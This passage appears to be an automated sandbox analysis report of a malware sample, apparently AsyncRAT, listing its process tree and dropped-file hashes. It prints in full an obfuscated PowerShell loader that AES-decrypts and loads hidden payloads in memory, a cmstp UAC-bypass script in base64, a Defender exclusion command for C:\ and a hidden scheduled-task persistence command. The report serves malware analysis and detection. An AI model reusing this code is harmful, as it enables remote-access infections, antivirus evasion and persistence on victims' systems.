bCwgJHJhbmRvbVhZWkluZkRhdGEpCiAgICB9IGNhdGNoIHsKICAgICAgICBBZGQtVHlwZSAkcmFuZG9tWFlaQ29kZQogICAgICAgICRyYW5kb21YWVpSZXN1bHQgPSBbcmFuZG9tWFlaQ01TVFBCeXBhc3NdOjpyYW5kb21YWVpFeGVjdXRlKCRyYW5kb21YWVpGaW5hbCwgJHJhbmRvbVhZWkluZkRhdGEpCiAgICB9CgogICAgaWYgKCRyYW5kb21YWVpSZXN1bHQpIHsKICAgICAgICByZXR1cm4KICAgIH0gZWxzZSB7CiAgICAgICAgcmV0dXJuCiAgICB9Cn0KCiRyYW5kb21YWVpQcm9jZXNzID0gKChHZXQtV21pT2JqZWN0IC1DbGFzcyB3aW4zMl9wcm9jZXNzKS5uYW1lIHwgU2VsZWN0LVN0cmluZyAiY21zdHAiIHwgU2VsZWN0LU9iamVjdCAqIC1GaXJzdCAxKS5QYXR0ZXJuCmlmICgkcmFuZG9tWFlaUHJvY2VzcyAtZXEgImNtc3RwIikgewogICAgdHJ5IHsKICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgImNtc3RwIiAtRm9yY2UKICAgICAgICByYW5kb21YWVpFeGVjdXRlCiAgICB9IGNhdGNoIHsKICAgICAgICByZXR1cm4KICAgIH0KfSBlbHNlIHsKICAgIHJhbmRvbVhZWkV4ZWN1dGUKfQp9CgojIEZ1bmN0aW9uIENhbGwKcmFuZG9tWFlaLUludm9rZS1VQUMgLXJhbmRvbVhZWkV4ZWN1dGFibGUgInBvd2Vyc2hlbGwiIC1yYW5kb21YWVpDb21tYW5kICIuKCdBZGQtTXBQJyArICdyZWZlcmVuY2UnKSAtRXhjbHVzaW9uUGF0aCBDOlwgLUV4Y2x1c2lvblByb2Nlc3MgcG93ZXJzaGVsbC5leGUi')))5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3896 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qcwr30pj\qcwr30pj.cmdline"6⤵
- Suspicious use of WriteProcessMemory
PID:852 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES84A1.tmp" "c:\Users\Admin\AppData\Local\Temp\qcwr30pj\CSC749F12447CED400BA4F3C43112807187.TMP"7⤵PID:784
-
-
-
C:\windows\system32\cmstp.exe"C:\windows\system32\cmstp.exe" /au C:\windows\temp\y0vzgtvo.inf6⤵PID:1840
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:4620 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ IEX '#EspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNK '.Replace('Espaco', ''); $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZTKslE6OdsXNtdeXo76Lj86BwdjokmZoErSJ0CEwRis='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ftBNGOmShOOXC7u6Pue69A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$ZjNXA=New-Object System.IO.MOBFOBFUSCUDAemOBFOBFUSCUDAorOBFOBFUSCUDAySOBFOBFUSCUDAtrOBFOBFUSCUDAeaOBFOBFUSCUDAm(,$param_var);'.Replace('OBFOBFUSCUDA', ''); IEX '$hkZyt=New-Object System.IO.OBFOBFUSCUDAMOBFOBFUSCUDAeOBFOBFUSCUDAmOBFOBFUSCUDAoOBFOBFUSCUDArOBFOBFUSCUDAyOBFOBFUSCUDASOBFOBFUSCUDAtOBFOBFUSCUDArOBFOBFUSCUDAeOBFOBFUSCUDAaOBFOBFUSCUDAmOBFOBFUSCUDA;'.Replace('OBFOBFUSCUDA', ''); IEX '$YeAxa=New-Object System.IO.COBFOBFUSCUDAomOBFOBFUSCUDAprOBFOBFUSCUDAeOBFOBFUSCUDAssOBFOBFUSCUDAioOBFOBFUSCUDAn.OBFOBFUSCUDAGZOBFOBFUSCUDAipOBFOBFUSCUDAStOBFOBFUSCUDAreOBFOBFUSCUDAamOBFOBFUSCUDA($ZjNXA, [IO.COBFOBFUSCUDAomOBFOBFUSCUDAprOBFOBFUSCUDAesOBFOBFUSCUDAsiOBFOBFUSCUDAonOBFOBFUSCUDA.CoOBFOBFUSCUDAmpOBFOBFUSCUDAreOBFOBFUSCUDAssOBFOBFUSCUDAiOBFOBFUSCUDAoOBFOBFUSCUDAnOBFOBFUSCUDAMode]::DOBFOBFUSCUDAeOBFOBFUSCUDAcOBFOBFUSCUDAompOBFOBFUSCUDAreOBFOBFUSCUDAss);'.Replace('OBFOBFUSCUDA', ''); $YeAxa.CopyTo($hkZyt); $YeAxa.Dispose(); $ZjNXA.Dispose(); $hkZyt.Dispose(); $hkZyt.ToArray();}function execute_function($param_var,$param2_var){ IEX '$hMSFrZstRXKXXSE=[System.ROBFOBFUSCUDAeOBFOBFUSCUDAflOBFOBFUSCUDAectOBFOBFUSCUDAioOBFOBFUSCUDAn.OBFOBFUSCUDAAsOBFOBFUSCUDAseOBFOBFUSCUDAmbOBFOBFUSCUDAlOBFOBFUSCUDAyOBFOBFUSCUDA]::LOBFOBFUSCUDAoOBFOBFUSCUDAaOBFOBFUSCUDAdOBFOBFUSCUDA([byte[]]$param_var);'.Replace('OBFOBFUSCUDA', ''); IEX '$YHCrtoDbeFwPknhvovWwaLUfKHQVaPjnhUuqCjeMELNaUjhfKCwCbvDmNxHMyHbovjIqSQTfrkRpYUkAzKlxtHmLqhDeBroXJyEKARmTJrlRDooTmhmNvDVOXXZLnODZWUFzpzZHxsObwuhcSKSufA=$hMSFrZstRXKXXSE.OBFOBFUSCUDAEOBFOBFUSCUDAnOBFOBFUSCUDAtOBFOBFUSCUDArOBFOBFUSCUDAyOBFOBFUSCUDAPOBFOBFUSCUDAoOBFOBFUSCUDAiOBFOBFUSCUDAnOBFOBFUSCUDAtOBFOBFUSCUDA;'.Replace('OBFOBFUSCUDA', ''); IEX '$YHCrtoDbeFwPknhvovWwaLUfKHQVaPjnhUuqCjeMELNaUjhfKCwCbvDmNxHMyHbovjIqSQTfrkRpYUkAzKlxtHmLqhDeBroXJyEKARmTJrlRDooTmhmNvDVOXXZLnODZWUFzpzZHxsObwuhcSKSufA.OBFOBFUSCUDAIOBFOBFUSCUDAnOBFOBFUSCUDAvOBFOBFUSCUDAoOBFOBFUSCUDAkOBFOBFUSCUDAeOBFOBFUSCUDA($null, $param2_var);'.Replace('OBFOBFUSCUDA', '');}$zQ = 'C:\Users\Admin\AppData\Local\Temp\c.bat';$host.UI.RawUI.WindowTitle = $zQ;$UwrDhZatxq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($zQ).Split([Environment]::NewLine);foreach ($EN in $UwrDhZatxq) { if ($EN.StartsWith(':: ')) { $Z=$EN.Substring(3); break; }}$payloads_var=[string[]]$Z.Split('\');IEX '$payload1_var=decompress_function (decrypt_function ([OBFOBFUSCUDACOBFOBFUSCUDAoOBFOBFUSCUDAnOBFOBFUSCUDAvOBFOBFUSCUDAeOBFOBFUSCUDArt]::OBFOBFUSCUDAFOBFOBFUSCUDArOBFOBFUSCUDAoOBFOBFUSCUDAmOBFOBFUSCUDABOBFOBFUSCUDAaOBFOBFUSCUDAse6OBFOBFUSCUDA4OBFOBFUSCUDASOBFOBFUSCUDAtOBFOBFUSCUDAriOBFOBFUSCUDAnOBFOBFUSCUDAgOBFOBFUSCUDA($payloads_var[0])));'.Replace('OBFOBFUSCUDA', '');IEX '$payload2_var=decompress_function (decrypt_function ([OBFOBFUSCUDACOBFOBFUSCUDAoOBFOBFUSCUDAnOBFOBFUSCUDAvOBFOBFUSCUDAeOBFOBFUSCUDArOBFOBFUSCUDAt]::OBFOBFUSCUDAFOBFOBFUSCUDArOBFOBFUSCUDAoOBFOBFUSCUDAmOBFOBFUSCUDABOBFOBFUSCUDAaOBFOBFUSCUDAsOBFOBFUSCUDAeOBFOBFUSCUDA6OBFOBFUSCUDA4OBFOBFUSCUDASOBFOBFUSCUDAtrOBFOBFUSCUDAiOBFOBFUSCUDAnOBFOBFUSCUDAg($payloads_var[1])));'.Replace('OBFOBFUSCUDA', '');execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('OBFOBFUSCUDA'));6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4516 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'svchoststr692_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\inicia_str_692.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4576
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\inicia_str_692.vbs"7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\inicia_str_692.bat" "8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4304 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ IEX '#EspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNK '.Replace('Espaco', ''); $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZTKslE6OdsXNtdeXo76Lj86BwdjokmZoErSJ0CEwRis='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ftBNGOmShOOXC7u6Pue69A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$ZjNXA=New-Object System.IO.MOBFOBFUSCUDAemOBFOBFUSCUDAorOBFOBFUSCUDAySOBFOBFUSCUDAtrOBFOBFUSCUDAeaOBFOBFUSCUDAm(,$param_var);'.Replace('OBFOBFUSCUDA', ''); IEX '$hkZyt=New-Object System.IO.OBFOBFUSCUDAMOBFOBFUSCUDAeOBFOBFUSCUDAmOBFOBFUSCUDAoOBFOBFUSCUDArOBFOBFUSCUDAyOBFOBFUSCUDASOBFOBFUSCUDAtOBFOBFUSCUDArOBFOBFUSCUDAeOBFOBFUSCUDAaOBFOBFUSCUDAmOBFOBFUSCUDA;'.Replace('OBFOBFUSCUDA', ''); IEX '$YeAxa=New-Object System.IO.COBFOBFUSCUDAomOBFOBFUSCUDAprOBFOBFUSCUDAeOBFOBFUSCUDAssOBFOBFUSCUDAioOBFOBFUSCUDAn.OBFOBFUSCUDAGZOBFOBFUSCUDAipOBFOBFUSCUDAStOBFOBFUSCUDAreOBFOBFUSCUDAamOBFOBFUSCUDA($ZjNXA, [IO.COBFOBFUSCUDAomOBFOBFUSCUDAprOBFOBFUSCUDAesOBFOBFUSCUDAsiOBFOBFUSCUDAonOBFOBFUSCUDA.CoOBFOBFUSCUDAmpOBFOBFUSCUDAreOBFOBFUSCUDAssOBFOBFUSCUDAiOBFOBFUSCUDAoOBFOBFUSCUDAnOBFOBFUSCUDAMode]::DOBFOBFUSCUDAeOBFOBFUSCUDAcOBFOBFUSCUDAompOBFOBFUSCUDAreOBFOBFUSCUDAss);'.Replace('OBFOBFUSCUDA', ''); $YeAxa.CopyTo($hkZyt); $YeAxa.Dispose(); $ZjNXA.Dispose(); $hkZyt.Dispose(); $hkZyt.ToArray();}function execute_function($param_var,$param2_var){ IEX '$hMSFrZstRXKXXSE=[System.ROBFOBFUSCUDAeOBFOBFUSCUDAflOBFOBFUSCUDAectOBFOBFUSCUDAioOBFOBFUSCUDAn.OBFOBFUSCUDAAsOBFOBFUSCUDAseOBFOBFUSCUDAmbOBFOBFUSCUDAlOBFOBFUSCUDAyOBFOBFUSCUDA]::LOBFOBFUSCUDAoOBFOBFUSCUDAaOBFOBFUSCUDAdOBFOBFUSCUDA([byte[]]$param_var);'.Replace('OBFOBFUSCUDA', ''); IEX '$YHCrtoDbeFwPknhvovWwaLUfKHQVaPjnhUuqCjeMELNaUjhfKCwCbvDmNxHMyHbovjIqSQTfrkRpYUkAzKlxtHmLqhDeBroXJyEKARmTJrlRDooTmhmNvDVOXXZLnODZWUFzpzZHxsObwuhcSKSufA=$hMSFrZstRXKXXSE.OBFOBFUSCUDAEOBFOBFUSCUDAnOBFOBFUSCUDAtOBFOBFUSCUDArOBFOBFUSCUDAyOBFOBFUSCUDAPOBFOBFUSCUDAoOBFOBFUSCUDAiOBFOBFUSCUDAnOBFOBFUSCUDAtOBFOBFUSCUDA;'.Replace('OBFOBFUSCUDA', ''); IEX '$YHCrtoDbeFwPknhvovWwaLUfKHQVaPjnhUuqCjeMELNaUjhfKCwCbvDmNxHMyHbovjIqSQTfrkRpYUkAzKlxtHmLqhDeBroXJyEKARmTJrlRDooTmhmNvDVOXXZLnODZWUFzpzZHxsObwuhcSKSufA.OBFOBFUSCUDAIOBFOBFUSCUDAnOBFOBFUSCUDAvOBFOBFUSCUDAoOBFOBFUSCUDAkOBFOBFUSCUDAeOBFOBFUSCUDA($null, $param2_var);'.Replace('OBFOBFUSCUDA', '');}$zQ = 'C:\Users\Admin\AppData\Roaming\inicia_str_692.bat';$host.UI.RawUI.WindowTitle = $zQ;$UwrDhZatxq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($zQ).Split([Environment]::NewLine);foreach ($EN in $UwrDhZatxq) { if ($EN.StartsWith(':: ')) { $Z=$EN.Substring(3); break; }}$payloads_var=[string[]]$Z.Split('\');IEX '$payload1_var=decompress_function (decrypt_function ([OBFOBFUSCUDACOBFOBFUSCUDAoOBFOBFUSCUDAnOBFOBFUSCUDAvOBFOBFUSCUDAeOBFOBFUSCUDArt]::OBFOBFUSCUDAFOBFOBFUSCUDArOBFOBFUSCUDAoOBFOBFUSCUDAmOBFOBFUSCUDABOBFOBFUSCUDAaOBFOBFUSCUDAse6OBFOBFUSCUDA4OBFOBFUSCUDASOBFOBFUSCUDAtOBFOBFUSCUDAriOBFOBFUSCUDAnOBFOBFUSCUDAgOBFOBFUSCUDA($payloads_var[0])));'.Replace('OBFOBFUSCUDA', '');IEX '$payload2_var=decompress_function (decrypt_function ([OBFOBFUSCUDACOBFOBFUSCUDAoOBFOBFUSCUDAnOBFOBFUSCUDAvOBFOBFUSCUDAeOBFOBFUSCUDArOBFOBFUSCUDAt]::OBFOBFUSCUDAFOBFOBFUSCUDArOBFOBFUSCUDAoOBFOBFUSCUDAmOBFOBFUSCUDABOBFOBFUSCUDAaOBFOBFUSCUDAsOBFOBFUSCUDAeOBFOBFUSCUDA6OBFOBFUSCUDA4OBFOBFUSCUDASOBFOBFUSCUDAtrOBFOBFUSCUDAiOBFOBFUSCUDAnOBFOBFUSCUDAg($payloads_var[1])));'.Replace('OBFOBFUSCUDA', '');execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('OBFOBFUSCUDA'));9⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2360
-
-
-
-
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe1⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3288
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:4416
-
C:\Windows\system32\taskkill.exetaskkill /IM cmstp.exe /F1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1340
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
2KB
MD5f8634c179c1a738e20815ec466527e78
SHA15ff99194f001b39289485a6c6fa0ba8b5f50aa42
SHA256b97b56e7ceecc7fe39522d3989d98bd233353d0269a7f6517e4a8286b4ed1dc4
SHA512806b40ab4b2cd38140210d1bff3317d51af96008526298aee07e67fa858d5e9646ba594d87a5f22ec5026ee25b93f62d600eb6da92216dfb524b28260fa7388f
-
Filesize
17KB
MD5e0369200eb2451ff0f5b98291ff6ea98
SHA19ce48c91bccfe62232bb90be64c9dc3a8df4cef9
SHA256aaebfb984fd75e1d93e63c5f7a58b096cf964672866cb7d9bff23e9e6f80c223
SHA5122213c9fcf9883891087f49a7315eae73ec2379580036f0cc2a590dd3ec9961e61ca2c47b0a0465c9bbe0d27eef80e2abb9729cd80a64e00a3ecbfee192189ff3
-
Filesize
1KB
MD54d556ed70ee29e534b9327c0e4c10577
SHA17a4e1d63f7f2f18cb607ff617092a505b7992b73
SHA256a8a6af3c6011fa00268e56ff04c337bbb797d55a62f80496bc0a4790e2f9375d
SHA512bfb020a849518b547da552186909163a01273c0e0bba1ae3f2d663470ef28ddf8b13835333965546c8c83d7e1c75cd516f2e9652df8478527b9b62a261990fb0
-
C:\Users\Admin\AppData\Local\Server\AsyncRAT.exe_Url_bsozgjfh10ettuvlzzecwz2b2kv3ubbv\0.5.8.0\user.config
Filesize319B
MD5f71f55112253acc1ef2ecd0a61935970
SHA1faa9d50656e386e460278d31b1d9247fdd947bb7
SHA256d1ad588a08c8c0799d7a14509f1e0a7ae04c519102ed9d328a83fe65999e6179
SHA512761b5c13e39bd4ae21d298084bbe747ae71c383fedf9a51fd5e9723a8b3b4547de459d82bac7f3f8f3bfc11cfb0528a4f1057b51996d7d046583109a53317b44
-
Filesize
203KB
MD502081ae0dbab5cbb3ba6fb3d316bb850
SHA10b422b950e717427ec53709384b214433871f78b
SHA256f93f8db130adb1cb891c6a8591d1c2f518a4ba3d5aed98d1e7b530030b0297bb
SHA5127ae8c0859f25c7cecaa0be83d5ac99d20bde7287ef1f49ddd3114d4683c8ec05a2947f0c0d27b62ea5b4b0764d6ae0a104ffa7d6d84a46b1bd0ecb1eac9d718d
-
Filesize
6.4MB
MD597a429c4b6a2cb95ece0ddb24c3c2152
SHA16fcc26793dd474c0c7113b3360ff29240d9a9020
SHA25606899071233d61009a64c726a4523aa13d81c2517a0486cc99ac5931837008e5
SHA512524a63f39e472bd052a258a313ff4f2005041b31f11da4774d3d97f72773f3edb40df316fa9cc2a0f51ea5d8ac404cfdd486bab6718bae60f0d860e98e533f89
-
Filesize
1KB
MD5b99ee0ee5bb75c0ffe25357f76203d7f
SHA1a0718c9264454752be79386b390216aa61d785ff
SHA256094202b506ca5d895f01c90dce5c9a6e831942e485f3af74bf117dd7d91d5c4d
SHA512d6b7d07f990fedb229f038abe5acbcc8bb62a00ff605d90abe3cf59723da58ed2d658bd4d8eb5b0ca374d3fbf9fa9f37223e88351a196750eeee06ba97aa9839
-
Filesize
1KB
MD575730abc0fcc55ca23d9af88003b0bb8
SHA15608562dbc144419535514cb2474bc5c584cec42
SHA256c5b9de8b1586065b4bd19de6c0976c535c0f2078a6ab59a4a94ca6d4b6e60156
SHA512fc23011f1e169ff2c25b846777362570a3877f94c66ba1d730fe7f579ce91a8015d2cb324b216294a82f5e186b1351edd18bd3d6c4d0e628ce3689c133f4866a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
74KB
MD588e72154cfed4a9932b4a4799aab6df7
SHA1043136d11ffa2f5aa6c8f6e961686a31a9eb50ef
SHA2563dc1f5d2c9260a882c6ebe35a4be8b407eced4ab579552b49d3e4d60ea68a373
SHA512f1479b3cab97a661360e9582a9cf5d49a28f8d92b63710e02345a3dfc19c151d8923990cf4c41936df9baae25a907e0c699133a8a0c4f09858d7a1021abf0bcf
-
Filesize
4KB
MD52b8fc91a71d061917f11f8e727691b99
SHA106c7e168360ba8f65e4a116e744afdcf90d86606
SHA256adc7a1eff362012ddaf63b81adb7741262de92ad88eda5a916c0001d9ed221f5
SHA512f2c59a3655a47967e0f27e20e8d9cf9e784363cb9343245d257621ac43dbaaaad9443b8d23e943663d38cef3f14e88fcf8fe1678f481df0b3ed2e49ef79360e8
-
Filesize
114B
MD58aaa4ef01bff86470a17506a329ff604
SHA196e9d0a926c1445eccaded2bcabc820ff6aacc99
SHA2568579f4352c7070e8743574902481d6ab588cbb40ae252a405e1cf00a10584718
SHA5129596ac1b26acacafc879513cf877a67cecc2ccd4dd12c981aadf89ec5915d2e3e1feb16b8c13289fb2f3ddbf62e754b2b3b0790383b5aac20e59d3684874cf8f
-
Filesize
663B
MD527581dbbe3c3840ce72f99c21071898a
SHA1898afeb9523df9367c74a01c0dbecf6b637f3cb1
SHA256c5f2bbdebccd52c3eba3c97a251ffa2ccd01f64de764e560f804045fe868d27b
SHA5120b9c4531e8be5b292638cb2cad7fd1b72ed3f1aa20ea027b9a013a8bfb2daaa4a25a40c37423e0924d110bbbbfad4a6e21aa03f4694978d205d7ac9739567d9f
-
Filesize
652B
MD5fffdba5429ec72558a58c61b48167bfb
SHA192c4dd45bdea6fa4c189941f8bfec176a2865502
SHA256df2ab29c1b4c86ea70301280021a787fcdf369c42119e453f5abf746a6e43b7d
SHA512f544ff8f47cc9581de726b5de325b772a1d798925359189fcbdbffd21a947c109b4901203dea5358b563a947a52cb38a929d2bafed6e31e28a539ff960902004
-
Filesize
2KB
MD5b8106096972fb511e0cf8b99386ecf93
SHA13003ba3a3681ba16d124d5b2305e6cc59af79b44
SHA25649d2a0f78cbec3d87396b6f52f791c66505edeec87a70d4ce45721288210da02
SHA512218bd9cd17c56d2e138205a197780cc2a5a81bfce7d5439eecb168f61955ba97793e7333425c064f6b6337e1f70c75bd373a7fb502a8c538fb046600018f871e
-
Filesize
369B
MD505b54c2118a33ff58a9f3b607b3a5e4f
SHA1eab4cb053c5fdeca4fdb6b2521f4b07afe831d66
SHA256983003704c619c805925490cb8561815b44ca5930a6d7fad4d72733328c0c730
SHA512e74a4d303218631251aae0343d55567c879ee4d73080eec0f7dfe659814c9fde80c98853727b1a7705e396ef7da031ce84cd0d409f64939bb4239ec49ac02af5